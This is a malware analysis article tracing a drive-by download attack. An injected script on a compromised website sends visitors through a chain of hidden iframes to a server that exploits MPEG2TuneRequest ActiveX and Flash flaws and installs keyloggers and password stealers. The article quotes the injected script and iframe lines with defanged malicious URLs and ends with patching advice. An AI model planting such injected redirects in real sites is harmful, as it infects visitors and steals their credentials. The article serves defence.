Get – ‘Site’ – Go

Introduction:

When we say ‘Internet’ the word that immediately strikes our mind is ‘Browser’. Browser acts as a Major component in the Cyber world. From layman to professionals use browser for different needs. Checking mails, online banking transactions, browsing forums, booking tickets, online shopping, ordering pizza, etc are done using browser. When we talk about banking transactions, online tickets, online shopping we’ve to understand how secured we are without exposing our sensitive information like passwords, credit card information, bank account details, etc. Most malware writers targets browser to spread malware and infect user’s computer to compromise system security. These infections happen without user consent.

This Article will explain in detail on how a compromised or malicious website redirects users to a Server where exploit is hosted. These attacks are active and in the Wild.

Attack:

This Attack is done by redirecting users to different websites and then finally directing to a server where exploit code is hosted. If a specific Vulnerability is found, the exploit code downloads a malicious binary and compromises system security. This is also done by compromising a legitimate site by injecting a script which redirects user to the server where exploit code and Malware are hosted. I’ll explain in detail with an example where a website redirects user to a malicious server which uses vulnerability to exploit.

The website I analyzed was ‘hxxp://nbyuxing.cn/’. When I scrutinized thoroughly over the site I found a script injected in few pages.

‘<script src=hxxp://318%78.com></script>’

When this script runs, %78 is decoded as ‘x’ which forms a link ‘hxxp://318x.com’. This site contains an Iframe pointing to a different page on the same server which is given below.

document.writeln("<iframe src=hxxp://%33%31%38%78%2E%63%6F%6D/%61%2E%68%74%6D width=0 height=0></iframe>");

The above link when decoded points to the URL ‘hxxp://318x.com/a.htm’. This URL again contains an Iframe but pointing to a different server,

<iframe src=hxxp://77yyj.8866.org/fkzd/16.htm width=0 height=0></iframe>

Still redirection continues since the above URL again contains an Iframe pointing to another server. This time it stops, because the actual exploit code is in the below server,

<iframe src=hxxp://109ee.cn/x150/xx.html width=111 height=0 border=0></iframe>

I know this will confuse, to be more precise below picture will show the complete flow how a user is redirected to a server containing exploit code. (Below picture will contain only domain, not the complete URL.)

The malicious code in the website hxxp://109ee.cn/x150/xx.html is written to exploit Flash Player and MPEG2 Tune Request Vulnerability. But how does it exploit?

The script checks if Internet Explorer version is 6 and if Operating system is Windows XP or Windows NT 5.1. Then it uses MPEG2 Tune Request Vulnerability which is wide spread and still targeting users in the wild. The vulnerability occurs within the ‘MPEG2TuneRequest’ object of ActiveX and is triggered when the object is instantiated with malformed input through the ‘data’ parameter. The associated CLSID for MPEG2 Tune Request is

“0955AC62-BF2E-4CBA-A2B9-A63F772D46”

If the Internet explorer version is greater than 7 or the Browser used by the user is Firefox, the code uses Adobe Flash player vulnerability. The code checks the version of flash player and if the condition satisfies, it downloads .swf files to exploit the Vulnerability.

The URL in the MPEG2TuneRequest exploit code was encoded as seen below,

When I decoded the above obfuscated code by finding the XOR key, the decrypted code revealed a URL from where the Malware is downloaded.

The .swf file downloaded from the server contains a URL as seen below,

When, any one of the above exploit succeeds, it downloads ‘hxxp://d.khtgf.cn/xx/x150.css’ which is a proper executable file.

I was very curious to know what this Malware does. So I started analyzing the downloaded file, which again downloaded a bunch of garbage in System folder.

These files are Game stealers, password stealers and Key loggers. Most of them are DLL files which hook to all the running processes as shown below to monitor user activity. Since DLL hooks cannot be viewed using Task Manager, it makes impossible for the user to identify the presence of Malware in his/ her system.

These Malware capture data, keystrokes and steal password information. Once the information is captured, it will be posted to the remote server through HTTP Post.

Solution:

To avoid such attacks it’s important to patch the web applications with latest security updates to avoid hacker compromising the website. It is also important how strong the web application passwords are, such as FTP to avoid brute force attacks. If such attack is already found in your website it is clear that your website is compromised. As an immediate action remove the injected code, change the passwords of the web applications, scan your server to check if any malware is hosted and patch the applications with the latest security updates. In the user perspective it is very important to update each and every application from Operating System to flash players, PDFs, etc, to avoid becoming a victim.